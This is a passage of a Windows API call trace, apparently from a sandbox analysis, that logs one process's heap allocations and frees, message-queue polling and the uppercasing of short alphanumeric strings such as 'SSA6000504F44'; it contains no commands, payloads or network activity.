[0257.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa6ab) returned 0x24b7a48 [0257.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1878 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0257.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0257.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8b0 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0257.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0257.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0257.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0257.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa6ab) returned 0x24cc7b8 [0257.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0257.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0257.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0257.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0257.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0257.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0257.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0257.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0257.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0257.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0257.118] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0257.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0257.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0257.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0257.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0257.118] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.118] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0257.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0257.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0257.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.119] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0257.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0257.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0257.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.120] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0257.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0257.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0257.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0257.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.121] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0257.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0257.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0257.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.121] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.122] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.122] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.122] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.122] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.122] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.123] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.123] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.123] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.123] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.123] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.123] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.124] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.124] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.124] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.125] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.125] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.125] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0257.125] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.126] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.126] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.126] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: 